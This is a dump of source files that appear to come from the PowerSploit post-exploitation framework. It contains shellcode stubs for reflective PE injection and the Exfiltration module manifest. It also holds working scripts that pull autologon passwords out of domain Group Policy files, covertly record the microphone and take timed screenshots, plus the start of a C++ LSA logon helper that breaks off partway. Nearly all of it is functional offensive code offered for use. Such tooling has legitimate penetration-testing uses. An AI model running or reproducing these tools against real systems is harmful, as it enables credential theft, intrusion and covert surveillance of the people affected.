/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included beause I didn't save it, this should just be for the SUPER easy stuff like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push rbx
7 | mov rbx, rsp
8 | and sp, 0xff00
9 |
10 | ; Call DllMain
11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
12 | mov rdx, 0x1 ; PROCESS_ATTACH
13 | mov r8, 0x0 ; NULL
14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
15 | call rax
16 |
17 | ; Fix stack
18 | mov rsp, rbx
19 | pop rbx
20 | ret
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Set a var to 1, let PS known exe is exiting
7 | mov rbx, 0x4141414141414141
8 | mov [rbx], byte 0x01
9 |
10 | ; Call exitthread instead of exitprocess
11 | sub rsp, 0xc0
12 | and sp, 0xFFf0 ; Needed for stack alignment
13 | mov rbx, 0x4141414141414141
14 | call rbx
15 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of rbx and stack
7 | push rbx
8 | mov rbx, rsp
9 |
10 | ; Set up stack for function call to GetProcAddress
11 | sub rsp, 0x20
12 | and sp, 0xffc0
13 |
14 | ; Call getprocaddress
15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS
16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
18 | call rax
19 |
20 | ; Store the result
21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
22 | mov [rcx], rax
23 |
24 | ; Restore stack
25 | mov rsp, rbx
26 | pop rbx
27 | ret
28 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save rsp and setup stack for function call
7 | push rbx
8 | mov rbx, rsp
9 | sub rsp, 0x20
10 | and sp, 0xffc0
11 |
12 | ; Call LoadLibraryA
13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS
14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
15 | call rdx
16 |
17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
18 | mov [rdx], rax
19 |
20 | ; Fix stack
21 | mov rsp, rbx
22 | pop rbx
23 | ret
24 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup
6 | push ebx
7 | mov ebx, esp
8 | and esp, 0xfffffff0
9 |
10 | ; Call DllMain
11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell
12 | mov edx, 0x1 ; PROCESS_ATTACH
13 | mov eax, 0x0 ; NULL
14 | push eax
15 | push edx
16 | push ecx
17 | mov eax, 0x41414141 ; Address of DllMain, set by PS
18 | call eax
19 |
20 | ; Fix stack
21 | mov esp, ebx
22 | pop ebx
23 | ret
24 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 | global _start
3 |
4 | _start:
5 | ; Set a var to 1, let PS know the EXE is exiting
6 | mov ebx, 0x41414141
7 | mov [ebx], byte 0x01
8 |
9 | ; Call exitthread instead of exit process
10 | sub esp, 0x20
11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment
12 | mov ebx, 0x41414141
13 | call ebx
14 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text]
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of ebx and stack
7 | push ebx
8 | mov ebx, esp
9 |
10 | ; Align stack
11 | and esp, 0xffffffc0
12 |
13 | ; Call GetProcAddress
14 | mov eax, 0x41414141 ; DllHandle, supplied by PS
15 | mov ecx, 0x41414141 ; Function name, supplied by PS
16 | push ecx
17 | push eax
18 | mov eax, 0x41414141 ; GetProcAddress address, supplied by PS
19 | call eax
20 |
21 | ; Write GetProcAddress return value to an address supplied by PS
22 | mov ecx, 0x41414141 ; Address supplied by PS
23 | mov [ecx], eax
24 |
25 | ; Fix stack
26 | mov esp, ebx
27 | pop ebx
28 | ret
29 |
--------------------------------------------------------------------------------
/CodeExecution/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire CodeExecution folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module CodeExecution`
7 |
8 | To see the commands imported, type `Get-Command -Module CodeExecution`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Exfiltration.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Exfiltration Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Format files (.ps1xml) to be loaded when importing this module
25 | FormatsToProcess = 'Get-VaultCredential.ps1xml'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
32 | 'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
33 | 'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
34 | 'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
35 | 'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
36 |
37 | }
38 |
--------------------------------------------------------------------------------
/Exfiltration/Exfiltration.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/Exfiltration/Get-GPPAutologon.ps1:
--------------------------------------------------------------------------------
1 | function Get-GPPAutologon
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
7 |
8 | PowerSploit Function: Get-GPPAutologon
9 | Author: Oddvar Moe (@oddvarmoe)
10 | Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
11 | License: BSD 3-Clause
12 | Required Dependencies: None
13 | Optional Dependencies: None
14 |
15 | .DESCRIPTION
16 |
17 | Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
18 |
19 | .EXAMPLE
20 |
21 | PS C:\> Get-GPPAutolgon
22 |
23 | UserNames File Passwords
24 | --------- ---- ---------
25 | {administrator} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}
26 | {NormalUser} \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}
27 |
28 |
29 | .EXAMPLE
30 |
31 | PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
32 |
33 | password
34 | password12
35 | password123
36 | password1234
37 | password1234$
38 | read123
39 | Recycling*3ftw!
40 |
41 | .LINK
42 |
43 | https://support.microsoft.com/nb-no/kb/324737
44 | #>
45 |
46 | [CmdletBinding()]
47 | Param ()
48 |
49 | #Some XML issues between versions
50 | Set-StrictMode -Version 2
51 |
52 | #define helper function to parse fields from xml files
53 | function Get-GPPInnerFields
54 | {
55 | [CmdletBinding()]
56 | Param (
57 | $File
58 | )
59 |
60 | try
61 | {
62 | $Filename = Split-Path $File -Leaf
63 | [xml] $Xml = Get-Content ($File)
64 |
65 | #declare empty arrays
66 | $Password = @()
67 | $UserName = @()
68 |
69 | #check for password and username field
70 | if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
71 | {
72 | $props = $xml.GetElementsByTagName("Properties")
73 | foreach($prop in $props)
74 | {
75 | switch ($prop.name)
76 | {
77 | 'DefaultPassword'
78 | {
79 | $Password += , $prop | Select-Object -ExpandProperty Value
80 | }
81 |
82 | 'DefaultUsername'
83 | {
84 | $Username += , $prop | Select-Object -ExpandProperty Value
85 | }
86 | }
87 |
88 | Write-Verbose "Potential password in $File"
89 | }
90 |
91 | #put [BLANK] in variables
92 | if (!($Password))
93 | {
94 | $Password = '[BLANK]'
95 | }
96 |
97 | if (!($UserName))
98 | {
99 | $UserName = '[BLANK]'
100 | }
101 |
102 | #Create custom object to output results
103 | $ObjectProperties = @{'Passwords' = $Password;
104 | 'UserNames' = $UserName;
105 | 'File' = $File}
106 |
107 | $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
108 | Write-Verbose "The password is between {} and may be more than one value."
109 | if ($ResultsObject)
110 | {
111 | Return $ResultsObject
112 | }
113 | }
114 | }
115 | catch {Write-Error $Error[0]}
116 | }
117 |
118 | try {
119 | #ensure that machine is domain joined and script is running as a domain account
120 | if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
121 | throw 'Machine is not a domain member or User is not a member of the domain.'
122 | }
123 |
124 | #discover potential registry.xml containing autologon passwords
125 | Write-Verbose 'Searching the DC. This could take a while.'
126 | $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
127 |
128 | if ( -not $XMlFiles ) {throw 'No preference files found.'}
129 |
130 | Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
131 |
132 | foreach ($File in $XMLFiles) {
133 | $Result = (Get-GppInnerFields $File.Fullname)
134 | Write-Output $Result
135 | }
136 | }
137 |
138 | catch {Write-Error $Error[0]}
139 | }
--------------------------------------------------------------------------------
/Exfiltration/Get-MicrophoneAudio.ps1:
--------------------------------------------------------------------------------
1 | function Get-MicrophoneAudio {
2 | <#
3 | .SYNOPSIS
4 | Records audio from the microphone and saves to a file on disk
5 | Author: Justin Warner (@sixdub)
6 | License: BSD 3-Clause
7 | Required Dependencies: None
8 | Optional Dependencies: None
9 |
10 | All credit for PowerSploit functions belongs to the original author and project contributors. Thanks for the awesomeness! See here for more info:
11 | http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
12 | https://github.com/PowerShellMafia/PowerSploit
13 |
14 | Thanks to Ed Wilson (Scripting Guy) for the one liner to generate random chars. https://blogs.technet.microsoft.com/heyscriptingguy/2015/11/05/generate-random-letters-with-powershell/
15 |
16 | .DESCRIPTION
17 | Get-MicrophoneAudio utilizes the Windows API from winmm.dll to record audio from the microphone and saves the wave file to disk.
18 |
19 | .OUTPUTS
20 | Outputs the FileInfo object pointing to the recording which has been saved to disk.
21 |
22 | .PARAMETER Path
23 | The location to save the audio
24 |
25 | .PARAMETER Length
26 | The length of the audio to record in seconds. Default: 30
27 |
28 | .PARAMETER Alias
29 | The alias to use for the WinMM recording. Default: Random 10 Chars
30 |
31 | .EXAMPLE
32 | Get-MicrophoneAudio -Path c:\windows\temp\secret.wav -Length 10 -Alias "SECRET"
33 | Description
34 | -----------
35 | Records 10 seconds of audio to the path C:\windows\temp\secret.wav using WinMM alias "secret"
36 | #>
37 | [OutputType([System.IO.FileInfo])]
38 | Param
39 | (
40 | [Parameter( Position = 0, Mandatory = $True)]
41 | [ValidateScript({Split-Path $_ | Test-Path})]
42 | [String] $Path,
43 | [Parameter( Position = 1, Mandatory = $False)]
44 | [Int] $Length = 30,
45 | [Parameter( Position = 2, Mandatory = $False)]
46 | [String] $Alias = $(-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))
47 |
48 | )
49 |
50 | #Get-DelegateType from PowerSploit
51 | function Local:Get-DelegateType
52 | {
53 | Param
54 | (
55 | [OutputType([Type])]
56 |
57 | [Parameter( Position = 0)]
58 | [Type[]]
59 | $Parameters = (New-Object Type[](0)),
60 |
61 | [Parameter( Position = 1 )]
62 | [Type]
63 | $ReturnType = [Void]
64 | )
65 |
66 | $Domain = [AppDomain]::CurrentDomain
67 | $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
68 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
69 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
70 | $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
71 | $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
72 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
73 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
74 | $MethodBuilder.SetImplementationFlags('Runtime, Managed')
75 |
76 | Write-Output $TypeBuilder.CreateType()
77 | }
78 |
79 | #Get-ProcAddress from PowerSploit
80 | function local:Get-ProcAddress
81 | {
82 | Param
83 | (
84 | [OutputType([IntPtr])]
85 |
86 | [Parameter( Position = 0, Mandatory = $True )]
87 | [String]
88 | $Module,
89 |
90 | [Parameter( Position = 1, Mandatory = $True )]
91 | [String]
92 | $Procedure
93 | )
94 |
95 | # Get a reference to System.dll in the GAC
96 | $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
97 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
98 | $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
99 | # Get a reference to the GetModuleHandle and GetProcAddress methods
100 | $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
101 | $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
102 | # Get a handle to the module specified
103 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
104 | $tmpPtr = New-Object IntPtr
105 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
106 |
107 | # Return the address of the function
108 | Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
109 | }
110 |
111 | #Initialize and call LoadLibrary on our required DLL
112 | $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
113 | $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
114 | $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
115 | $HND = $null
116 | $HND = $LoadLibrary.Invoke('winmm.dll')
117 | if ($HND -eq $null)
118 | {
119 | Throw 'Failed to aquire handle to winmm.dll'
120 | }
121 |
122 | #Initialize the function call to count devices
123 | $waveInGetNumDevsAddr = $null
124 | $waveInGetNumDevsAddr = Get-ProcAddress winmm.dll waveInGetNumDevs
125 | $waveInGetNumDevsDelegate = Get-DelegateType @() ([Uint32])
126 | if ($waveInGetNumDevsAddr -eq $null)
127 | {
128 | Throw 'Failed to aquire address to WaveInGetNumDevs'
129 | }
130 | $waveInGetNumDevs = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($waveInGetNumDevsAddr, $waveInGetNumDevsDelegate)
131 |
132 | #Initilize the function call to record audio
133 | $mciSendStringAddr = $null
134 | $mciSendStringAddr = Get-ProcAddress winmm.dll mciSendStringA
135 | $mciSendStringDelegate = Get-DelegateType @([String],[String],[UInt32],[IntPtr]) ([Uint32])
136 | if ($mciSendStringAddr -eq $null)
137 | {
138 | Throw 'Failed to aquire address to mciSendStringA'
139 | }
140 | $mciSendString = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mciSendStringAddr, $mciSendStringDelegate)
141 |
142 | #Initialize the ability to resolve MCI Errors
143 | $mciGetErrorStringAddr = $null
144 | $mciGetErrorStringAddr = Get-ProcAddress winmm.dll mciGetErrorStringA
145 | $mciGetErrorStringDelegate = Get-DelegateType @([UInt32],[Text.StringBuilder],[UInt32]) ([bool])
146 | if ($mciGetErrorStringAddr -eq $null)
147 | {
148 | Throw 'Failed to aquire address to mciGetErrorString'
149 | }
150 | $mciGetErrorString = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mciGetErrorStringAddr,$mciGetErrorStringDelegate)
151 |
152 | #Get device count
153 | $DeviceCount = $waveInGetNumDevs.Invoke()
154 |
155 | if ($DeviceCount -gt 0)
156 | {
157 |
158 | #Define buffer for MCI errors. https://msdn.microsoft.com/en-us/library/windows/desktop/dd757153(v=vs.85).aspx
159 | $errmsg = New-Object Text.StringBuilder 150
160 |
161 | #Open an alias
162 | $rtnVal = $mciSendString.Invoke("open new Type waveaudio Alias $alias",'',0,0)
163 | if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}
164 |
165 | #Call recording function
166 | $rtnVal = $mciSendString.Invoke("record $alias", '', 0, 0)
167 | if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}
168 |
169 | Start-Sleep -s $Length
170 |
171 | #save recorded audio to disk
172 | $rtnVal = $mciSendString.Invoke("save $alias `"$path`"", '', 0, 0)
173 | if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}
174 |
175 | #terminate alias
176 | $rtnVal = $mciSendString.Invoke("close $alias", '', 0, 0);
177 | if ($rtnVal -ne 0) {$mciGetErrorString.Invoke($rtnVal,$errmsg,150); $msg=$errmsg.ToString();Throw "MCI Error ($rtnVal): $msg"}
178 |
179 | $OutFile = Get-ChildItem -path $path
180 | Write-Output $OutFile
181 |
182 | }
183 | else
184 | {
185 | Throw 'Failed to enumerate any recording devices'
186 | }
187 | }
188 |
--------------------------------------------------------------------------------
/Exfiltration/Get-TimedScreenshot.ps1:
--------------------------------------------------------------------------------
1 | function Get-TimedScreenshot
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Takes screenshots at a regular interval and saves them to disk.
7 |
8 | PowerSploit Function: Get-TimedScreenshot
9 | Author: Chris Campbell (@obscuresec)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | A function that takes screenshots and saves them to a folder.
17 |
18 | .PARAMETER Path
19 |
20 | Specifies the folder path.
21 |
22 | .PARAMETER Interval
23 |
24 | Specifies the interval in seconds between taking screenshots.
25 |
26 | .PARAMETER EndTime
27 |
28 | Specifies when the script should stop running in the format HH-MM
29 |
30 | .EXAMPLE
31 |
32 | PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
33 |
34 | .LINK
35 |
36 | http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
37 | https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1
38 | #>
39 |
40 | [CmdletBinding()] Param(
41 | [Parameter(Mandatory=$True)]
42 | [ValidateScript({Test-Path -Path $_ })]
43 | [String] $Path,
44 |
45 | [Parameter(Mandatory=$True)]
46 | [Int32] $Interval,
47 |
48 | [Parameter(Mandatory=$True)]
49 | [String] $EndTime
50 | )
51 |
52 | #Define helper function that generates and saves screenshot
53 | Function Get-Screenshot {
54 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
55 |
56 | $VideoController = Get-WmiObject -Query 'SELECT VideoModeDescription FROM Win32_VideoController'
57 |
58 | if ($VideoController.VideoModeDescription -and $VideoController.VideoModeDescription -match '(?^\d+) x (?\d+) x .*$') {
59 | $Width = [Int] $Matches['ScreenWidth']
60 | $Height = [Int] $Matches['ScreenHeight']
61 | } else {
62 | $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
63 |
64 | $Width = $ScreenBounds.Width
65 | $Height = $ScreenBounds.Height
66 | }
67 |
68 | $Size = New-Object System.Drawing.Size($Width, $Height)
69 | $Point = New-Object System.Drawing.Point(0, 0)
70 |
71 | $ScreenshotObject = New-Object Drawing.Bitmap $Width, $Height
72 | $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
73 | $DrawingGraphics.CopyFromScreen($Point, [Drawing.Point]::Empty, $Size)
74 | $DrawingGraphics.Dispose()
75 | $ScreenshotObject.Save($FilePath)
76 | $ScreenshotObject.Dispose()
77 | }
78 |
79 | Try {
80 |
81 | #load required assembly
82 | Add-Type -Assembly System.Windows.Forms
83 |
84 | Do {
85 | #get the current time and build the filename from it
86 | $Time = (Get-Date)
87 |
88 | [String] $FileName = "$($Time.Month)"
89 | $FileName += '-'
90 | $FileName += "$($Time.Day)"
91 | $FileName += '-'
92 | $FileName += "$($Time.Year)"
93 | $FileName += '-'
94 | $FileName += "$($Time.Hour)"
95 | $FileName += '-'
96 | $FileName += "$($Time.Minute)"
97 | $FileName += '-'
98 | $FileName += "$($Time.Second)"
99 | $FileName += '.png'
100 |
101 | #use join-path to add path to filename
102 | [String] $FilePath = (Join-Path $Path $FileName)
103 |
104 | #run screenshot function
105 | Get-Screenshot
106 |
107 | Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
108 |
109 | Start-Sleep -Seconds $Interval
110 | }
111 |
112 | #note that this will run once regardless if the specified time as passed
113 | While ((Get-Date -Format HH:mm) -lt $EndTime)
114 | }
115 |
116 | Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}
117 | }
118 |
--------------------------------------------------------------------------------
/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VaultItemView
6 |
7 | VAULTCLI.VAULTITEM
8 |
9 |
10 |
11 |
12 |
13 |
14 | Vault
15 |
16 |
17 | Resource
18 |
19 |
20 | Identity
21 |
22 |
23 | Credential
24 |
25 |
26 | PackageSid
27 |
28 |
29 | LastModified
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp:
--------------------------------------------------------------------------------
1 | // LogonUser.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | size_t wcsByteLen( const wchar_t* str );
9 | void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
10 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
11 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
12 |
13 | int _tmain(int argc, _TCHAR* argv[])
14 | {
15 | //Get a handle to LSA
16 | HANDLE hLSA = NULL;
17 | NTSTATUS status = LsaConnectUntrusted(&hLSA);
18 | if (status != 0)
19 | {
20 | cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
21 | return -1;
22 | }
23 | if (hLSA == NULL)
24 | {
25 | cout << "hLSA is NULL, this shouldn't ever happen" << endl;
26 | return -1;
27 | }
28 |
29 | //Build LsaLogonUser parameters
30 | LSA_STRING originName = {};
31 | char originNameStr[] = "qpqp";
32 | originName.Buffer = originNameStr;
33 | originName.Length = (USHORT)strlen(originNameStr);
34 | originName.MaximumLength = originName.Length;
35 |
36 | ULONG authPackage = 0;
37 | PLSA_STRING authPackageName = new LSA_STRING();
38 | char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
39 | authPackageName->Buffer = authPackageBuf;
40 | authPackageName->Length = (USHORT)strlen(authPackageBuf);
41 | authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf);
42 | status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage);
43 | if (status != 0)
44 | {
45 | int winError = LsaNtStatusToWinError(status);
46 | cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError;
47 | return -1;
48 | }
49 |
50 | DWORD authBufferSize = 0;
51 | PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
52 | cout << "authBufferSize: " << authBufferSize << endl;
53 |
54 | //Get TokenSource
55 | HANDLE hProcess = GetCurrentProcess();//todo
56 | HANDLE procToken = NULL;
57 | BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken);
58 | if (!success)
59 | {
60 | DWORD errorCode = GetLastError();
61 | cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
62 | return -1;
63 | }
64 |
65 | TOKEN_SOURCE tokenSource = {};
66 | DWORD realSize = 0;
67 | success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
68 | if (!success)
69 | {
70 | cout << "Call to GetTokenInformation failed." << endl;
71 | return -1;
72 | }
73 |
74 |
75 | //Misc
76 | PVOID profileBuffer = NULL;
77 | ULONG profileBufferSize = 0;
78 | LUID loginId;
